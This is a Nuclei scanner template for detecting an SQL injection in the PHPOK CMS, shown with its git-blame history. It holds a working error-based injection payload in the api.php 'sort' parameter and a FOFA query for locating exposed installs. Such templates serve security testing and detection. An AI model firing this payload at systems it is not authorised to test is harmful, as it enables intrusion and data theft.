nuclei-templates/vulnerabilities/other/phpok-sqli.yaml

id: phpok-sqli

info:
  name: PHPOK - Sql Injection
  author: ritikchaddha
  severity: high
  metadata:
    verified: true
    fofa-query: app="phpok"
  tags: phpok,sqli

variables:
  num: "999999999"

requests:
  - method: GET
    path:
      - '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'
Create phpok-sqli.yaml 2022-06-05 08:31:28 +00:00			`id: phpok-sqli`

			`info:`
Update phpok-sqli.yaml 2022-06-05 11:39:00 +00:00			`name: PHPOK - Sql Injection`
Create phpok-sqli.yaml 2022-06-05 08:31:28 +00:00			`author: ritikchaddha`
			`severity: high`
			`metadata:`
Update phpok-sqli.yaml 2022-06-30 03:02:35 +00:00			`verified: true`
Update phpok-sqli.yaml 2022-06-05 08:36:26 +00:00			`fofa-query: app="phpok"`
Create phpok-sqli.yaml 2022-06-05 08:31:28 +00:00			`tags: phpok,sqli`

Update phpok-sqli.yaml 2022-06-30 03:01:16 +00:00			`variables:`
			`num: "999999999"`

Create phpok-sqli.yaml 2022-06-05 08:31:28 +00:00			`requests:`
			`- method: GET`
			`path:`
Update phpok-sqli.yaml 2022-06-30 03:01:16 +00:00			`- '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+'`
Create phpok-sqli.yaml 2022-06-05 08:31:28 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Update phpok-sqli.yaml 2022-06-30 03:01:16 +00:00			`- '{{md5({{num}})}}'`